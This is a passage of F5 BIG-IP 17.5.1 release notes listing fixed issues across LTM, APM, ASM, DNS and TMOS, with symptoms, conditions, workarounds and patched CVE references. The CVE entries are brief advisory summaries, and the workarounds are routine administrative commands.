Change driver type to use xnet in tmm_init.tcl by inputting `device driver pci vendor_dev 8086:1889 xnet` or for a specific PCI device with `device driver pci XX:XX.X xnet`

Fix:
Removed offloading IPv4 header checksum to the hardware unless TSO is on and so use what BIG-IP calculates instead.

Fixed Versions:
17.5.1


1756397-3 : BIG-IP is not forwarding the Extended DNS Error (EDE) Codes to Clients

Links to More Info: BT1756397

Component: Global Traffic Manager (DNS)

Symptoms:
When BIG-IP processes responses from upstream name servers, it strips the Extended DNS Error (EDE) information, which provides additional details about the cause of DNS errors.

Conditions:
-- BIG-IP is configured with a listener that has a DNS profile to process DNS queries.
-- DNS requests from clients include the EDNS (Extension Mechanisms for DNS) flag.

Impact:
DNS clients will not receive additional information about the cause of DNS errors.

Workaround:
None

Fix:
With the fix, BIG-IP is now able to process and respond to clients with Extended DNS Errors (EDE) information that it receives from upstream name servers.

We have exposed the fix through a Db variable called dns.forwardextendeddnserrorcode. By default, the Extended DNS Errors(EDE) support is disabled. If you want to enable EDE support you can change the Db variable value to enable.
sys db dns.forwardextendeddnserrorcode {
    value "enable"
}
To avoid truncation due to lengthy extra text that is part of the EDE, we have limited it to 64 bytes.

Fixed Versions:
17.5.1


1753933-4 : CVE-2020-14393 perl-dbi: Buffer overflow on an overlong DBD class name

Component: TMOS

Symptoms:
A buffer overflow was found in perl-DBI < 1.643 in DBI.xs. A local attacker who is able to supply a string longer than 300 characters could cause an out-of-bounds write, affecting the availability of the service or integrity of data.

Conditions:
Triggered when loading a DBD module with an excessively long class name.

Impact:
This vulnerability may cause a heap-based buffer overflow, potentially leading to a crash or arbitrary code execution.

Workaround:
NA

Fix:
Patched Perl-DBI to fix the vulnerability.

Fixed Versions:
17.5.1


1753617-5 : CVE-2023-24621 Untrusted Polymorphic Deserialization to Java Classes

Component: TMOS

Symptoms:
It allows untrusted deserialisation to Java classes by default, where the data and class are controlled by the author of the YAML document being processed.

Conditions:
yamlbeans versions before 1.15 are vulnerable

Impact:
It can result in remote code execution (RCE) or denial of service.

Workaround:
N/A

Fix:
yamlbeans has been patched to address this vulnerability.

Fixed Versions:
17.5.1.2


1737465-3 : Port number being used for verifying server certificate CN field

Links to More Info: BT1737465

Component: Access Policy Manager

Symptoms:
TMM reports a SSL certificate error:

warning tmm1[18695]: 01260022:4: Peer cert verification: The common name (10.1.1.1) is invalid or does not match the authenticate name (10.1.1.1:4430). The subject alternative name also does not match the authenticate name.

Conditions:
-- The ssl server certificate is set to "require"
-- The URI includes the port number

Impact:
SSL server certificate validation fails

Workaround:
Set server certificate requirement to "ignore"

Fixed Versions:
17.5.1


1709557-2 : Header value length greater than 1023 in alternate response file headers causing ASM restart loop

Links to More Info: BT1709557

Component: Application Security Manager

Symptoms:
Bd goes into a restart loop with the following error messages:

ECARD_POLICY|NOTICE|Oct 25 02:01:27.939|21735|table_funcs.cpp:1471|handle_table_dynamic CONFIG_TYPE_ACCOUNT_ALTERNATE_RESPONSE_FILE_HEADERS res:[0]
BD_MISC|ERR |Oct 25 02:01:27.939|21735|temp_func.c:2295|CONFIG_TYPE_PROTOBUF_FILENAMES message had parsing error: could not parse protobuf message
BD_MISC|ERR |Oct 25 02:01:27.939|21735|table_funcs.cpp:2734|CONFIG_TYPE_PROTOBUF_FILENAMES message had errors in block_index: 22. status=-1
BD_MISC|NOTICE|Oct 25 02:01:27.939|21735|table_funcs.cpp:2734|{"component":"BD","datetime":"1969-12-31T16:00:00Z","jobId":"","jobStartDatetime":"1969-12-31T16:00:00Z","jobStatus":"failed"}
BD_MISC|ERR |Oct 25 02:01:27.940|21735|temp_func.c:2288|CONFIG_TYPE_MANIFEST message had parsing error: could not parse protobuf message

Conditions:
A header in the blocking page is configured to be more than 1023 bytes.

Impact:
Endless restart loop

Workaround:
Change the blocking page header size.

Fixed Versions:
17.5.1


1708189-3 : ICMP errors with HSL can rarely cause tmm cores

Links to More Info: BT1708189

Component: Local Traffic Manager

Symptoms:
High-speed logging configured to use a remote syslog server can cause tmm to core if the server sends back ICMP errors (like ICMP unreachable).

Conditions:
-- High Speed Logging to a remote syslog server
-- Remote server sends back ICMP errors

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fixed Versions:
17.5.1.2


1701209-2 : APM ignores the update-interval setting

Links to More Info: BT1701209

Component: Access Policy Manager

Symptoms:
Irrespective of update-interval value, APM fetches the CRL from the CRLDP for each client certificate.

Conditions:
Configure update-interval.

Impact:
Multiple request keep triggering to update the CRL cache.

Workaround:
None

Fixed Versions:
17.5.1.2


1697273-4 : CVE-2020-8037 tcpdump: ppp decapsulator can be convinced to allocate a large amount of memory

Links to More Info: K000149929


1697041-2 : TMM may fail to start, device is inoperative

Links to More Info: BT1697041

Component: Local Traffic Manager

Symptoms:
In very rare circumstances, tmm may fail to start and log a message similar to the following:

/var/log/tmm:
notice vmxnet3(1.3)[1b:00.0]: Waiting for tmm1 to reach state 1...

/var/log/tmm1:
notice Failed to connect to TMROUTED: ERR_INPROGRESS. Try again in 10 seconds.

notice MCP connection expired early in startup; retrying

While the issue is occurring, there will be incomplete ARP entries for tmm.

# arp -an | grep 127.1.1.
? (127.1.1.2) at <incomplete> on tmm
? (127.1.1.3) at <incomplete> on tmm
? (127.1.1.4) at <incomplete> on tmm
? (127.1.1.6) at <incomplete> on tmm
? (127.1.1.7) at <incomplete> on tmm
? (127.1.1.8) at <incomplete> on tmm

Conditions:
-- BIG-IP VE
-- Hypervisor under high load

This has also been reported to occur after the reboot during an upgrade.

Impact:
Tmm is unable to start

Workaround:
Restart tmm manually with

bigstart restart tmm

Alternatively, set up a static arp mapping on the linux host:

arp -s 127.1.1.2 00:01:23:45:67:01
arp -s 127.1.1.3 00:01:23:45:67:02
arp -s 127.1.1.4 00:01:23:45:67:03
arp -s 127.1.1.5 00:01:23:45:67:04
arp -s 127.1.1.6 00:01:23:45:67:05
arp -s 127.1.1.7 00:01:23:45:67:06
arp -s 127.1.1.8 00:01:23:45:67:07

If there are more than 8 tmms, the following script can be used:

for y in $(seq $(/usr/bin/getdb Provision.tmmCountActual)); do arp -s 127.1.1.$(($y+1)) 00:01:23:45:67:$(printf "%02g" $y); done

Fix:
Fixed a race condition during tmm startup.

Fixed Versions:
17.5.1.2


1692917-5 : CVE-2024-6232 CPython Tarfile vulnerability

Links to More Info: K000148252, BT1692917


1678809-5 : CVE-2023-26117: Angular JS vulnerability

Links to More Info: K000150967


1678805-5 : CVE-2023-26118 angularjs: Regular Expression Denial of Service via the <input type="url"> element

Links to More Info: K000150967


1678793-5 : CVE-2019-14863 angular: Cross-site Scripting (XSS) due to no proper sanitization of xlink:href attributes

Links to More Info: K000141459


1678789-5 : CVE-2019-10768 AngularJS: Prototype pollution in merge function could result in code injection

Links to More Info: K000141463


1678777-5 : CVE-2022-25869 angular.js : insecure page caching in the browser, which allows interpolation of <textarea> elements.

Links to More Info: K000141459


1678769-5 : CVE-2023-26116 angularjs: Regular Expression Denial of Service via angular.copy()

Links to More Info: K000141463


1673161-4 : CVE-2023-45853 zlib: integer overflow and resultant heap-based buffer overflow in zipOpenNewFileInZip4_6

Links to More Info: K000149884, BT1673161


1672997-3 : Apmd memory grows over time in AD/LDAP auth scenarios

Links to More Info: BT1672997

Component: Access Policy Manager

Symptoms:
Apmd memory grows over time. It is mainly due to memory fragmentation due to memory sharing among apmd threads.

Conditions:
The access policy in use has AD/LDAP auth as one of the agents

Impact:
Apmd memory grows over time. After it grows beyond a limit, oom killer might kill apmd thereby leading to traffic disruption.

Workaround:
None

Fixed Versions:
17.5.1, 16.1.6


1672313-5 : CVE-2016-9841 zlib: Out-of-bounds pointer arithmetic in inffast.c

Links to More Info: K000149915, BT1672313


1672249-5 : CVE-2016-9840 zlib: Out-of-bounds pointer arithmetic in inftrees.c

Links to More Info: K000149905, BT1672249


1636077-2 : Adding an operationally DOWN interface to existing LAG causes traffic disruption on r2k/r4k

Links to More Info: BT1636077

Component: Local Traffic Manager

Symptoms:
When an operationally DOWN interface is added to an existing LAG interface, traffic flow to the tenant stops on r2k/r4k based appliances.

Conditions:
-- Interface is marked down
-- Interface is added to an existing LAG interface

Impact:
Traffic flow gets impacted and the system misses the packets routed onto the LACP trunk to where the LAG member was added.

Workaround:
Restart tmm on all tenants that are associated with the trunk.

Fixed Versions:
17.5.1


1635209-3 : Firewall NAT policy with SNAT automap does not work with ALG protocols in active mode

Links to More Info: BT1635209

Component: Advanced Firewall Manager

Symptoms:
Connection is dropping when firewall NAT policy uses SNAT automap and ALG.

Conditions:
-- Firewall NAT translation using source automap.
-- ALG protocol profile applied.

Impact:
-- Connection is dropped

Workaround:
None

Fix:
Done

Fixed Versions:
17.5.1.2


1629701-2 : Attack signature is not shown in local event log for staged entity when not in learn/staging

Links to More Info: BT1629701

Component: Application Security Manager

Symptoms:
Attack signature is not shown in local event log for staged entity when the attack signatures are not in learning/staging.

Conditions:
- Security policy with staged URL, parameter or cookie;
- Attack signatures are not in learning or staging;
- Attack is detected by signature in request.

Impact:
Detected attack signature is not shown in local event log.

Workaround:
Possible workarounds:
- enable learning for attack signatures;
- examine detected signatures via remote log (if enabled).

Fix:
Detected attack signatures are now shown also for staged entities.

Fixed Versions:
17.5.1


1628001-4 : TMM core when ACL operation is performed on a deleted session

Links to More Info: BT1628001

Component: Access Policy Manager

Symptoms:
TMM core

Conditions:
A session was deleted while performing an ACL iRule action.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
The TMM crash caused when performing iRule command
"[ACCESS::acl matched]" for a deleted session, this can be mitigated by adding a check for session existence like below

==================
set sessionid [ACCESS::session data get {session.user.sessionid}]

if {[ACCESS::session exists -sid $sessionid]} {
    if {[ACCESS::acl matched] eq <ACL NAME>}
    {
    ///Logic
    }
  } else {
        log local0. "Session does not exist"
  }
=============

Fixed Versions:
17.5.1


1626337-4 : RPMS not being included in the generated UCS with fix of ID985329 incorporated

Links to More Info: K81310610, BT1626337

Component: Device Management

Symptoms:
While saving the UCS file after installing iAppLX RPMs, iAppLX RPMs are not included in the UCS file. The issue is observed in BIG-IP running software release that includes fix of ID985329.

Some possible symptoms:
-- AS3 replies with a "404 not found" error after upgrading
-- iAppLX applications that have a GUI, such as SSL Orchestrator, display a "Not Found" or "Access forbidden" error after upggrading

Conditions:
- Saving UCS using either CLI (Command Line Interface) or GUI
- BIG-IP running software release that includes fix of ID985329 (starting with verison 16.1.5, 17.1.2, 17.5.0)

Impact:
iAppLX RPMs and iAppLX declarations will be missing if UCS restore is performed. This can cause issues such as "NotFound" or "Access Forbidden" when trying to access the iAppLX.

This can be encountered following an upgrade from verison 16.1.5, 17.1.2, 17.5.0 to a later version.

Workaround:
Mitigation depends on the iAppLX package you are using because uninstall/reinstall approach is sometimes different.

SSL Orchestrator
Follow the recovery steps in K81310610: SSL Orchestrator Configuration: Access forbidden or Not Found or show wizard of new topology
https://my.f5.com/manage/s/article/K81310610

Access Guided Configuration
Follow the recovery steps in K55177400: Guided configuration displays: Not found - The requested URL was not found on this server
https://my.f5.com/manage/s/article/K55177400.

AS3 or any other manually-installed iAppLX
Follow the recovery steps in K000132348: AS3 declaration failure: mgmt shared service-discovery task update response=404 body
https://my.f5.com/manage/s/article/K000132348

Impact of workaround: uninstalling and reinstalling an iAppLX RPM should not impact the configuration data that the iAppLX was managing; for example uninstalling and reinstalling AS3 will not cause the previously-loaded AS3 declaration to be lost.

Fix:
If you upgrade from affected version to unaffected, you will still have to complete the workaround as described in K81310610 article.

Fixed Versions:
17.5.1


1623941-4 : [AD] BIG-IP APM AD Auth agent sometimes prompts for new password (every login) after upgrade

Links to More Info: BT1623941

Component: Access Policy Manager

Symptoms:
AD Auth agent always prompts for a new password after upgrading from v15.x to v17.1.x The user password is *NOT* expired in Active Directory. The user account does not have the "User must change password at next logon" option checked.
This can be seen any in any version upgrades.

Conditions:
Active Directory auth is configured

Impact:
After the upgrade to v17.1.x, v16.1.x, v15.1.x change password prompt appears every time you log in.

Workaround:
None

Fix:
Added the Client constructer as a part of the Client Initialisation

Fixed Versions:
17.5.1, 16.1.6


1623597-3 : Nat46/64 hardware connection re-offload is not optimal.

Links to More Info: BT1623597

Component: TMOS

Symptoms:
Nat46/64 hardware connection re-offload is not optimal.

Conditions:
Nat46/64 configuration with hardware offload (fastl4).

Impact:
Not optimal resource usage.

Workaround:
None

Fixed Versions:
17.5.1


1623197-5 : CVE-2024-37891 urllib3: proxy-authorization request header is not stripped during cross-origin redirects

Links to More Info: K000140711, BT1623197


1622789-3 : Traffic levels for NAT64/46 traffic might be different after an upgrade

Links to More Info: BT1622789

Component: TMOS

Symptoms:
Starting from version 16.X BIG-IP supports hardware acceleration of NAT64/46 traffic. Due to a software defect part of accelerated traffic might not be reported properly in connection statistics.

Conditions:
Nat64/46 virtual server with fastL4 PVA acceleration enabled.

Impact:
Part of accelerated traffic might not be reported properly in connection statistics.

Workaround:
None

Fixed Versions:
17.5.1, 17.1.2


1622425-2 : Float the management ip to the next available ip when the connectivity of primary blade is lost

Links to More Info: BT1622425

Component: Local Traffic Manager

Symptoms:
When the connectivity of the primary blade is lost with the management interface, then the UI is also lost.

Conditions:
The primary blade lost connectivity on the management interface.

Impact:
Lost chassis monitoring/alerting and access to the Management GUI.

Workaround:
Manual switchover of the slot will solve the issue.

Fix:
Float the management ip to the next available ip when the primary blade loses connectivity on the management interface without disturbing the data plane.

Fixed Versions:
17.5.1.2


1621269-1 : TMM restart loop when attaching large number of interfaces.

Links to More Info: BT1621269

Component: TMOS

Symptoms:
TMM is unable to finish initialization when attaching 9 or more Intel 710/E810 SR-IOV interfaces.

Conditions:
-- Using 9 or more Intel 710/E810 SR-IOV VFs

Impact:
BIG-IP is unable to go into the Active state because TMM restart loop is present.

Workaround:
Update Mcpd.KeepAliveCount DB variable to 127 and reboot the BIG-IP.

Fix:
DB variable Mcpd.KeepAliveCount was introduced to keep network connections between TMOS proccesses alive longer. Therefore, TMM would have enough time to finish initializing when attaching 9 or more Intel 710/E810 SR-IOV interfaces.

Fixed Versions:
17.5.1


1621185-2 : A BD crash on a specific scenario, even after ID1553989

Links to More Info: BT1621185

Component: Application Security Manager

Symptoms:
A BD crash, failover.

Conditions:
Specific requests under specific conditions.

Impact:
Traffic disrupted while bd restarts.

Workaround:
None

Fix:
Fixed a bd crash while passing traffic.

Fixed Versions:
17.5.1


1620785-4 : F5 cache mechanism relies only on Last-Modified/If-Modified-Since headers and ignores the etag/If-None-Match headers

Links to More Info: BT1620785

Component: Local Traffic Manager

Symptoms:
-- Server has a document x with etag - AAAA
-- When the client requests for x through BIG-IP, BIG-IP caches it and responds with 200 OK.
-- Document on Server changes; new etag is BBBB and cache in BIG-IP is expired
-- Clients sending requests with If None-Match: BBBB, should receive 304 with BBBB response but receiving 200 OK with AAAA.

Conditions:
-- Client having access to the server directly and through BIG-IP with cache enabled.
(Or)
-- Deployment containing two BIG-IPs with caching enabled one at a time.

Impact:
BIG-IP serves old documents when requested with etag of the latest document

Workaround:
When HTTP_REQUEST_RELEASE {

 if { [HTTP::header exists If-None-Match] && [HTTP::header exists ETag] }{

   HTTP::header remove If-None-Match

 }

}

Fixed Versions:
17.5.1


1617037-4 : [PA]"navigator.userAgent" detects Chrome browser as Safari

Links to More Info: BT1617037

Component: Access Policy Manager

Symptoms:
You may observe an error like below in Developer tools console
Uncaught TypeError: TypeError: Cannot read properties of undefined (reading 'document')

Conditions:
Accessing applications through Portal Access

Impact:
Unable to access applications via Portal Access.

Workaround:
None

Fixed Versions:
17.5.1.2


1612885-3 : [PORTAL] Handle error in get_frameElement()

Links to More Info: BT1612885

Component: Access Policy Manager

Symptoms:
You may see get_frameElement() related errors in Devtools Console:
cache-fm-Modern.js:1494 Uncaught TypeError: Cannot read properties of undefined (reading 'document')

Conditions:
Portal Access configured on APM

Impact:
Failure in loading application through Portal Access.

Workaround:
None

Fixed Versions:
17.5.1, 17.1.2


1600561-5 : CVE-2024-2961 glibc Vulnerability

Links to More Info: K000140901


1596097-5 : CVE-2023-37369 qtbase: buffer overflow in QXmlStreamReader

Links to More Info: K000148809


1596073-5 : CVE-2023-38197 qtbase: infinite loops in QXmlStreamReader

Links to More Info: K000148809


1592209-3 : Monitored objects stays "Offline (Enabled)" even after manually enabling the server object after reboot

Links to More Info: BT1592209

Component: Global Traffic Manager (DNS)

Symptoms:
A Generic host server object reports “Offline (Enabled)”.

When enabling the server object, the bellow message is logged to /var/log/gtm:

gtmd[xxxx]: 011a5004:1: SNMP_TRAP: Server /Common/[generic-server] (ip=192.1.1.51) state change blue --> red (No enabled virtual server available)

Conditions:
-- Any operations that cause GTMd to rebuild its probe list. Following are a few example operations:
- Monitored objects being disabled,
- GTMd restart,
- Loss of iQuery to other GTMs,
- Adding or removing probes.

-- BIG-IP is running on a software versions 17.1.1 or 16.1.5 or later versions in which the ID 1133201 is fixed.

Impact:
Virtual servers that are associated with the affected generic server object may stay unavailable. Hence, pool or wideIP, which uses the affected server object, may be unavailable too.

Workaround:
After the issue, restart the GTMd. Generic host server object will be get back to 'Available (Enabled)' status.

Following is an example command to restart the GTMd:
# tmsh restart /sys service gtmd

Global server load balancing is disrupted while gtmd is restarted.

Fixed Versions:
17.5.1.2


1591813-12 : [APM][SAML] SP automation fails with error message 'cannot update (cert_type)'

Links to More Info: BT1591813

Component: Access Policy Manager

Symptoms:
Whenever a certificate is updated while fetching the metadata from the metadata URL in SAML automation for creating SP connector, an error occurs:

err mcpd[8894]: 01070712:3: Caught configuration exception (0), file:(/Common/sp_cert.crt) cannot update (cert_type).

Conditions:
- Configure BIG-IP as IDP with SP automation objects (metadata URL as internal virtual server URL)
- Configure a internal virtual server and attach an iRule to get the iFile based on the URI.
   (https://1.1.1.1/PS0028JP)
-. Update the iFiles that returns metadata and wait till the SP-automation to update its sp-connector objects
 PS0028JP -> ifile that returns metadata of SP with different cert ( self signed to CA and viceversa)

Impact:
Connector automation fails to create SP Connectors with new certificates.

Workaround:
None

Fixed Versions:
17.5.1


1591481-4 : CVE-2017-1000381: C-ares Vulnerability iRulesLX

Links to More Info: K000149130


1591249-5 : CVE-2018-6913 perl: heap buffer overflow in pp_pack.c

Links to More Info: K000141301, BT1591249


1589661-5 : CVE-2019-3860 libssh2: Out-of-bounds reads with specially crafted SFTP packets

Links to More Info: K000149288, BT1589661


1589645-5 : CVE-2019-3859 libssh2: Unchecked use of _libssh2_packet_require and _libssh2_packet_requirev resulting in out-of-bounds read

Links to More Info: K000149288


1587453-2 : “default-all” profile is selected by default in “Dynamic LAN address spaces”

Links to More Info: BT1587453

Component: Access Policy Manager

Symptoms:
“default-all” profile is selected by default in “Dynamic LAN address spaces” when a new Network Access Connection is created

Conditions:
Create a new Network access resource

Impact:
Split tunnel will be ignored and the connection will be full tunnel due “default-all” profile being selected by default in “Dynamic LAN address spaces”

Workaround:
Remove "default-all" from “Dynamic LAN address spaces”

Fix:
"default-all" is no longer selected by default in “Dynamic LAN address spaces”

Fixed Versions:
17.5.1.2


1587421-2 : GUI issue when creating a new Network Access connection

Links to More Info: BT1587421

Component: Access Policy Manager

Symptoms:
In Basic view, selecting Split Tunnel does not show the LAN Address Space field.

The configuration is saved with default-all and creates a full tunnel.

Moving default-all to Available triggers an error:

LAN Address Space cannot be empty

Conditions:
Creating a new Network Access connection in Basic view with Split Tunnel enabled.

Impact:
Cannot configure Split Tunnel in Basic view.

Leads to full tunnel unless configured via the Advanced view.

Workaround:
Use Advanced view and set IPv4 LAN Address Space manually

Fix:
'IPv4 LAN address space' option is now available in 'Basic' view when split tunnel checkbox is selected

Fixed Versions:
17.5.1.2


1586537-3 : CVE-2024-0985 postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL

Links to More Info: K000140188


1585277-4 : Libexpat through 2.6.1 allows an XML Entity Expansion attack: CVE-2024-28757

Links to More Info: K000139637, BT1585277


1583745-3 : "Out of bounds" TCL error in VDI iRule

Links to More Info: BT1583745

Component: Access Policy Manager

Symptoms:
You may observe below error logs in /var/log/ltm

“Out of bounds” TCL error

Conditions:
Citrix VDI with an Integration mode.

Impact:
Unable to process VDI traffic.

Workaround:
None

Fixed Versions:
17.5.1.2


1583261-3 : Saml traffic can rarely cause tmm cores

Links to More Info: BT1583261

Component: Access Policy Manager

Symptoms:
Tmm seg faults in saml_sp_crypto_ctx_init.

Conditions:
This was seen when there was a permissions error loading the service provider key.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fixed Versions:
17.5.1


1582781-6 : CVE-2021-23177 libarchive: extracting a symlink with ACLs modifies ACLs of target

Links to More Info: K000140961, BT1582781


1580357-2 : CVE-2016-2037 CVE-2015-1197 cpio: out of bounds write

Component: TMOS

Symptoms:
The cpio_safer_name_suffix function in util.c in cpio 2.11 allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted cpio file.

Conditions:
Extraction of a crafted archive using the cpio utility.

Impact:
The Vulnerability may lead to out-of-bounds write, potentially causing a crash or arbitrary code execution.

Workaround:
NA

Fix:
Patched cpio to fix the vulnerability.

Fixed Versions:
17.5.1


1579533-3 : Jitterentropy read is restricted to FIPS mode or TMM usage only, for performance reasons

Links to More Info: BT1579533

Component: Local Traffic Manager

Symptoms:
If jitterentropy-read from CPU jitter is used in all cases, a big performance problem is seen for most cases where BIG-IP works in non-FIPS mode. This can be encountered after upgrading to version 17.x from an earlier BIG-IP version.

Conditions:
The issues occur when BIG-IP operates in non-FIPS or FIPS mode and use jitterentropy to generate seed.

Impact:
Very high CPU utilization is seen when BIG-IP handles traffic while in non-FIPS mode.

Workaround:
None

Fix:
Jitterentropy-read of CPU jitter is now invoked in any one of these situations,
- Either BIG-IP operates in FIPS mode,
- TMM is processing traffic in non-FIPS and FIPS modes. In this case, none of the other components perform the stated jitter read operations and improves performance.

Fixed Versions:
17.5.1


1576897-4 : CVECVE-2016-9063 firefox: Possible integer overflow to fix inside XML_Parse in Expat

Links to More Info: K000139691, BT1576897


1576125-4 : Node.js vulnerability CVE-2024-27983

Links to More Info: K000139532, BT1576125


1572145-5 : CVE-2023-29469 libxml2: Hashing of empty dict strings isn't deterministic

Links to More Info: K000139592, BT1572145


1567761-3 : [APM] AccessProfile name is missing in log User '<username>' belongs to domain '<domain_name>'

Links to More Info: BT1567761

Component: Access Policy Manager

Symptoms:
When a user logs in using the VPN using an alternate alias for the domain name, a log message is logged to the apm debug logs. But it does not include the access profile name in the log:

debug apmd[13866]: 0149017b:7: ::c9b6820d: AD module: User 'testuser@mysite.com' belongs to domain 'mysite.net'

Conditions:
User logged in using AD Auth with alternate alias for domain name.

Impact:
The debug log message is ambiguous.

Workaround:
None

Fixed Versions:
17.5.1


1566997-5 : CVE-2016-10349 libarchive: Heap-based buffer over-read in the archive_le32dec function

Links to More Info: K000148259


1566533-7 : CVE-2017-18342 PyYAML: yaml.load() API could execute arbitrary code

Links to More Info: K000139901, BT1566533


1555525-4 : WCCP traffic may have its source port changed

Links to More Info: BT1555525

Component: Local Traffic Manager

Symptoms:
WCCP traffic may have its source port changed as it leaves the Linux host. This could cause WCCP sessions to not be established.

Conditions:
-- WCCP configured
-- BIG-IP Virtual Edition platform or r2000 or r4000 tenants.

Impact:
WCCP messages may not be successfully processed by the peer because the source port is not 2048.

Workaround:
Cat >> /config/tmm_init.tcl << EOF

proxy BIGSELF {
   listen 0.0.0.0%\${rtdom_any} 2048 netmask 0.0.0.0 {
     proto \$ipproto(udp)
     srcport strict
     idle_timeout 30
     transparent
     no_translate
     no_arp
     l2forward
     tap enable all
     protect
   }
   profile _bigself
 }
EOF

bigstart restart tmm

Fixed Versions:
17.5.1, 17.1.2, 16.1.6


1553169-4 : Parsing tcp payload using iRules can be inaccurate because of binary to string conversion

Links to More Info: BT1553169

Component: Local Traffic Manager

Symptoms:
When an iRule is used to parse tcp payload, the value returned as string can be inaccurate.

Conditions:
TCP payload is parsed using iRule.

Impact:
The iRule functionality may not work as expected, as the parsed data can be inaccurate.

Workaround:
None

Fix:
None

Fixed Versions:
17.5.1.2


1552705-6 : New subsession reads access_token from per-session policy instead of per-request policy.

Links to More Info: BT1552705

Component: Access Policy Manager

Symptoms:
When BIG-IP is configured with OAuth Agents both in per-session policy and per-request policy, OAuth Flow fails to execute successfully.

Conditions:
When new subsessions are created TMM fails to read the access token from subsession variables. Therefore, gets the old token from the main session, i.e. per-session policy.

Impact:
BIG-IP Administrator will not be able to configure BIG-IP as OAuth Client & RS with both per-session policy and per-request policy.

Workaround:
Use OAuth Agents only in the per-request policy, configure per-session policy with just empty allow.

Fixed Versions:
17.5.1, 16.1.6


1550869-4 : Tmm leak on request-logging or response logging on FTP virtual server

Links to More Info: BT1550869

Component: Local Traffic Manager

Symptoms:
Tmm memory leak is observed.

Conditions:
Either of these conditions:

-- An LTM profile with request-logging enabled
-- response-logging enabled on a virtual server supporting FTP

Impact:
A tmm memory leak occurs.

Workaround:
Disable request/response logging on the FTP virtual server.

Fixed Versions:
17.5.1


1550785-4 : HSB lock up in Syn-Ack generator module

Component: TMOS

Symptoms:
Datapath flow control in HSB RX and TX directions. Datapath lockup detected by BIG-IP.

Conditions:
Syn Cookie feature is enabled.

Impact:
Datapath lockup. Requires reboot.

Workaround:
This has been fixed in all iSeries platforms for BIG-IP versions 15.1.x, 16.1.x, 17.1.x, 15.5.x.

Fixed in these bitfiles and all bitfiles newer than these.

v15.1.x:

ID1757053: HSB v2.10.8.0 bitstream release for VIPRION B2250 blades
ID1759517: HSB v3.8.98.0 bitstream release for VIPRION B44x0 blades
ID1593933: HSB v5.6.10.0 bitstream release for i5000 / i7000 / i10000-series appliances
ID1593929: HSB v5.23.10.0 bitstream release for i11000-series appliances

v16.1.x:

ID1554997: HSB v2.12.6.0 bitsteam release for VIPRION B2250 blades
ID1564281: HSB v3.10.5.0 bitstream release for VIPRION B44x0 blades
ID1572961: HSB v5.8.5.0 bitstream release for i5000 / i7000 / i10000-series appliances
ID1574653: HSB v5.25.4.0 bitstream release for i11000-series appliances

v17.1.x / v17.5.x:

ID1587357: HSB v2.13.5.0 bitsteam release for VIPRION B2250 blades
ID1582633: HSB v3.11.6.0 bitstream release for VIPRION B44x0 blades
ID1587341: HSB v5.9.9.0 bitstream release to AFM for i5000 / i7000 / i10000-series appliances
ID1587349: HSB v5.26.5.0 bitstream release for i11000-series appliances

Fix:
Bug was found and fixed in the Syn-Ack generator module in the FPGA.

First bitfiles with the fix are listed in the Mitigation / Workaround section.

Fixed Versions:
17.5.1, 17.1.0


1519001-4 : After a crash, tmm may experience memory corruption

Links to More Info: BT1519001

Component: Local Traffic Manager

Symptoms:
On an F5OS tenant on affected platforms, if tmm does not stop gracefully - meaning it crashed or was killed, it may experience memory corruption when it starts again, leading to another crash.

Conditions:
-- F5OS tenant on a VELOS system or an r5000, r10000, or r12000-series appliance.
-- Tmm does not shut down gracefully

r4000 and r2000 series appliances are not affected.

Impact:
Tmm may crash again when it starts up. Traffic disrupted while tmm restarts.

Workaround:
Reboot the tenant, or if tmm is able to start, shut down tmm gracefully and restart.

Fix:
The data mover no longer corrupts memory when tmm is starting after a crash.

Fixed Versions:
17.5.1.2


1517561-5 : CVE-2023-28484 libxml2: NULL dereference in xmlSchemaFixupComplexType

Links to More Info: K000139641, BT1517561


1505649-3 : SSL Handshake fall back to full handshake during session resumption, if SNI string is more than 32 characters in length

Links to More Info: BT1505649

Component: Local Traffic Manager

Symptoms:
When the SNI string is longer than 32 characters, the SSL handshake switches to the full handshake when session resumption is attempted.

Conditions:
- SSL resumption should be enabled in the client's SSL profile of their BIG-IP.
- SNI string should be more than 32 characters in length of the SSL client Hello packet received from the user.

Impact:
SSL resumption would fail if the SNI string is more than 32 characters in length.

Workaround:
using strings lesser than 32 characters for SNI

Fixed Versions:
17.5.1, 17.1.2


1505301-2 : CVE-2022-29154 rsync: remote arbitrary files write inside the directories of connecting peers

Component: TMOS

Symptoms:
A flaw was found in rsync that is triggered by a victim rsync user/client connecting to a malicious rsync server. The server can copy and overwrite arbitrary files in the client's rsync target directory and subdirectories. This flaw allows a malicious server, or in some cases, another attacker who performs a man-in-the-middle attack, to potentially overwrite sensitive files on the client machine, resulting in further exploitation.

Conditions:
NA

Impact:
This flaw allows a malicious server, or in some cases, another attacker who performs a man-in-the-middle attack, to potentially overwrite sensitive files on the client machine, resulting in further exploitation.

Workaround:
NA

Fix:
Patched rsync to fix this vulnerability

Fixed Versions:
17.5.1.2


1494229-5 : CVE-2023-2953 openldap: null pointer dereference in ber_memalloc_x function

Links to More Info: K000138814, BT1494229


1492337-4 : TMM fails to start up using Xnet-DPDK-virtio due to out of bounds MTU

Links to More Info: BT1492337

Component: TMOS

Symptoms:
TMM goes into a restart loop and fails to start with an error message that the MTU is out of bounds

Log message:
   notice virtio_mtu_set(): MTU should be between 68 and 1500

Conditions:
- Using Xnet-DPDK-virtio driver
- NIC is configured to have an MTU less than NDAL's configured MTU. By default, this is an MTU < 9198

Impact:
TMM goes into a restart loop and fails to start

Workaround:
Create /config/tmm_init.tcl with the following entry
ndal mtu <value> 1af4:1041

Replacing <value> with the corresponding value in the following log line in /var/log/tmm
  notice virtio_mtu_set(): MTU should be between 68 and <value>

Fix:
Refactored code to not restart TMM if set MTU operation fails.

Fixed Versions:
17.5.1


1470177-6 : CVE-2023-46218 curl: information disclosure by exploiting a mixed case flaw

Links to More Info: K000138650


1469393-2 : Browser extension can cause Bot-Defense profile screen to misfunction

Links to More Info: BT1469393

Component: Application Security Manager

Symptoms:
One of the ad-blocker browser extensions is reported to cause bot-defense GUI not working properly.

Conditions:
Ad-blocker extension installed in browser

Impact:
Bot-defense screen might not work properly

Workaround:
Disable ad-blocker extension or use private/incognito mode.

Fixed Versions:
17.5.1


